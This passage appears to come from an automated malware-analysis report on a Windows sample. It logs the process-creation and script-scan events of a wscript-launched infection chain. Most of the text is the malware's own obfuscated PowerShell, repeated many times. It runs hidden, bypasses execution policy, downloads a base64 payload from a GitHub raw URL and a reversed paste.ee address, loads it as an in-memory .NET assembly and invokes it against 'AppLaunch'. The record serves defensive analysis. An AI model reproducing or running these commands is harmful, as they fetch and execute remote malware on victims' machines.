AHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($base64Content); $assembly = [Reflection.Assembly]::Load($binaryContent); $command = '[dnlib.IO.Home]::VAI("0/zbEuc/d/ee.etsap//:sptth", "1", "C:\ProgramData\", "tondinho", "AppLaunch
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($base64Content); $assembly = [Reflection.Assembly]::Load($binaryContent); $command = '[dnlib.IO.Home]::VAI("0/zbEuc/d/ee.etsap//:sptth", "1", "C:\ProgramData\", "tondinho", "AppLaunch
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsA